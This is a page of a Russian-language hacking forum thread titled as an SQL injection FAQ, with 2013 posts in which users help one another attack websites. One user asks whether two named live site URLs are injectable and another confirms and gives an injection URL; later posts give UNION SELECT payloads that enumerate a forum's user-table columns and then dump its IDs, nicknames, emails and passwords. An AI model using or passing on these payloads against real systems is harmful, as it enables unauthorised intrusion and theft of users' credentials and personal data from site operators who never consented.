HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу SQL injection полный FAQ
   
 
Страница 24 из 26 « Первая < 14 20 21 22 23 24 25 26 >
 
Опции темы Поиск в этой теме Опции просмотра

  #231  
Старый 12.01.2013, 13:19
satana_name
Guest
Сообщений: n/a
Провел на форуме:
658

Репутация: 0
По умолчанию
OxoTnik, спасибо, с темой уяснил.
 

  #232  
Старый 03.03.2013, 18:54
pharm_all
Познающий
Регистрация: 10.09.2009
Сообщений: 40
Провел на форуме:
72737

Репутация: 1
По умолчанию
Есть ли тут скуля ?

http://propelarizona.com/member/278

http://propelarizona.com/member/173/50
 

  #233  
Старый 03.03.2013, 19:04
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию
Цитата:
Сообщение от pharm_all  
pharm_all said:
Есть ли тут скуля ?
http://propelarizona.com/member/278
http://propelarizona.com/member/173/50
Скуля есть, для простоты инъекций используй url http://propelarizona.com/member/173/blog_id=50
 

  #234  
Старый 04.03.2013, 02:43
pharm_all
Познающий
Регистрация: 10.09.2009
Сообщений: 40
Провел на форуме:
72737

Репутация: 1
По умолчанию
Цитата:
Сообщение от OxoTnik  
OxoTnik said:
Скуля есть, для простоты инъекций используй url http://propelarizona.com/member/
173/blog_id=50
OxoTnik

Не могу понять, там 3 версия мускула? Почему -то не выводит unionom 19 вроде полей.
 

  #235  
Старый 19.03.2013, 06:26
uinLEADER
Новичок
Регистрация: 29.01.2010
Сообщений: 0
Провел на форуме:
2508

Репутация: 0
По умолчанию
объясните плиз что такое подзапросы...
 

  #236  
Старый 31.03.2013, 10:20
LomasterII
Guest
Сообщений: n/a
Провел на форуме:
5126

Репутация: 5
По умолчанию
Цитата:
Сообщение от None  
И вот мы нашли поля login, password.
а что дальше, как их выбирать?

запрос

Код HTML:
HTML:
?q=532&n=108316' and 1=0 union select 1,COLUMN_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.COLUMNS where table_name='aph_forum_users' --
Выводит

Id

Nik

Email

Pasw
 

  #237  
Старый 31.03.2013, 11:06
BlackIce
Guest
Сообщений: n/a
Провел на форуме:
18665

Репутация: 27
По умолчанию
Цитата:
Сообщение от LomasterII  
LomasterII said:
а что дальше, как их выбирать?
запрос
Код HTML:
HTML:
?q=532&n=108316' and 1=0 union select 1,COLUMN_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.COLUMNS where table_name='aph_forum_users' --
Выводит
Id
Nik
Email
Pasw
Ну у Вас выводятся имена столбцов таблицы. Чтобы вывести значения этих столбцов, просто впишите в запрос имена и укажите с какой таблицы делать выборку. В Вашем случает примерно так...

?q=532&n=108316' and 1=0 union select 1,CONCAT_WS(0x3a,Id,Nik,Email,Pasw),3,4,5,6,7 FROM aph_forum_users --
 

  #238  
Старый 08.10.2013, 00:12
Jack-seo
Guest
Сообщений: n/a
Провел на форуме:
303

Репутация: 0
По умолчанию
я вот непойму,

ну допустим есть уязвимый параметр id который попадает к примеру в такой запрос

SELECT `domain` FROM `mpm` where `id` ='2'

вот я например хочу вывести данные из информатион скхема

SELECT `domain` FROM `mpm` where `id` ='2' union select

`table_name` from information_schema.tables limit+0,1

почему в ответ пишет Unknown table 'mpm' in information_schema ???

(тестирую в phpmyadimn)
 

  #239  
Старый 08.10.2013, 10:44
\/IRUS
Guest
Сообщений: n/a
Провел на форуме:
118953

Репутация: 37
По умолчанию
Цитата:
Сообщение от Jack-seo  
Jack-seo said:
я вот непойму,
ну допустим есть уязвимый параметр id который попадает к примеру в такой запрос
SELECT `domain` FROM `mpm` where `id` ='2'
вот я например хочу вывести данные из информатион скхема
SELECT `domain` FROM `mpm` where `id` ='2' union select
`table_name` from information_schema.tables limit+0,1
почему в ответ пишет Unknown table 'mpm' in information_schema ???
(тестирую в phpmyadimn)
SELECT `domain` FROM `mpm` where `id` ='2' AND 1=0 union select

`table_name` from information_schema.tables limit+0,1
 

  #240  
Старый 08.10.2013, 11:13
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Цитата:
Сообщение от \/IRUS  
\/IRUS said:
SELECT `domain` FROM `mpm` where `id` ='2' AND 1=0 union select
`table_name` from information_schema.tables limit+0,1
Произойдет такая же ошибка, так как, скорее всего, у него не выбрана база данных.

Цитата:
Сообщение от None  
SELECT `domain` FROM `
DATABASE
`.`mpm` where `id` ='2' AND 1=0 union select `table_name` from information_schema.tables limit+0,1
 
 
Страница 24 из 26 « Первая < 14 20 21 22 23 24 25 26 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ